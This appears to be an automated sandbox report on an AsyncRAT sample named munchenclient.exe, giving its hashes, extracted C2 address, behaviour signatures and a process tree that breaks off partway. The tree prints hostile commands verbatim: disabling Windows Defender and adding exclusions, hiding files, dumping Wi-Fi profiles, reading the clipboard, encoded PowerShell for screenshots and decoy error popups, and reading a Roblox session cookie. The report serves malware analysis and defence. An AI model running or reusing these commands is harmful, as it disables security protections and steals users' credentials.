Analysis

  • max time kernel
    13s
  • max time network
    26s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2024 19:44

General

  • Target

    munchenclient.exe

  • Size

    6.3MB

  • MD5

    b995bac46098f434d11d84ec79bcb6ac

  • SHA1

    3bb75ae3a8ec4054ccbeea3e3b2daf854bad81e2

  • SHA256

    0a7f831cb637214cae61b0e833bd5e5fabadd5dc5d4d68331fe76cce091e1542

  • SHA512

    72a515bfb170f0c06a26b3907cf31802a1ebb3b148d0f3a60d4424ea899f5f1b38d9a4bfd5fe25960d65eda8623e9ac12f1069d2940b1ad7e234c8bf78da54ce

  • SSDEEP

    196608:kpPx7IW+Ryxgp1qRAL1vJYrET+9b6P32gm/uMkOPx5WzN:k9x5gp1qSL1vJYrM8b+3NkOOPxy

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Gibsons

C2

198.98.58.93:999

Mutex

obamanet_floyd999

Attributes
  • delay

    1

  • install

    true

  • install_file

    Core Sound Service.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\munchenclient.exe
    "C:\Users\Admin\AppData\Local\Temp\munchenclient.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAcwBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABjAG8AZABlACAAZQB4AGUAYwB1AHQAaQBvAG4AIABjAGEAbgBuAG8AdAAgAHAAcgBvAGMAZQBlAGQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIAB3AGEAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAC4AIABSAGUAaQBuAHMAdABhAGwAbABpAG4AZwAgAHQAaABlACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbQBhAHkAIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AaQBxACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2916
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcwByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAaABrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdgBpACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3008
    • C:\Users\Admin\AppData\Local\Temp\munchenclients.exe
      "C:\Users\Admin\AppData\Local\Temp\munchenclients.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAeABoACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAbQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AGSB0ACAAcwB0AGEAcgB0ACAAYgBlAGMAYQB1AHMAZQAgAE0AUwBWAEMAUAAxADQAMAAuAGQAbABsACAAaQBzACAAbQBpAHMAcwBpAG4AZwAgAGYAcgBvAG0AIAB5AG8AdQByACAAYwBvAG0AcAB1AHQAZQByAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHEAcABlACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4832
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AagBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAcAB1ACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3272
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Users\Admin\AppData\Local\Temp\Built.exe
          "C:\Users\Admin\AppData\Local\Temp\Built.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4072
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1812
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2376
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
            5⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3060
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
              6⤵
              • Views/modifies file attributes
              PID:680
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4568
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3532
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1684
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:5028
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3428
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1212
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
            5⤵
            • Clipboard Data
            • Suspicious use of WriteProcessMemory
            PID:5084
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-Clipboard
              6⤵
              • Clipboard Data
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2912
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
              PID:2508
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:1392
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              5⤵
                PID:4380
                • C:\Windows\system32\tree.com
                  tree /A /F
                  6⤵
                    PID:920
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                  5⤵
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5044
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profile
                    6⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2632
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  5⤵
                    PID:2600
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      6⤵
                      • Gathers system information
                      PID:4040
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                    5⤵
                      PID:4468
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:924
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cw4ihhbk\cw4ihhbk.cmdline"
                          7⤵
                            PID:1920
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7AE.tmp" "c:\Users\Admin\AppData\Local\Temp\cw4ihhbk\CSC8DA6D9AA28243E09C24A7FF9A6837B2.TMP"
                              8⤵
                                PID:1156
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          5⤵
                            PID:3580
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              6⤵
                                PID:2968
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              5⤵
                                PID:4264
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  6⤵
                                    PID:4404
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  5⤵
                                    PID:4688
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      6⤵
                                        PID:3936
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      5⤵
                                        PID:1492
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          6⤵
                                            PID:4448
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          5⤵
                                            PID:4796
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              6⤵
                                                PID:4928
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              5⤵
                                                PID:3468
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
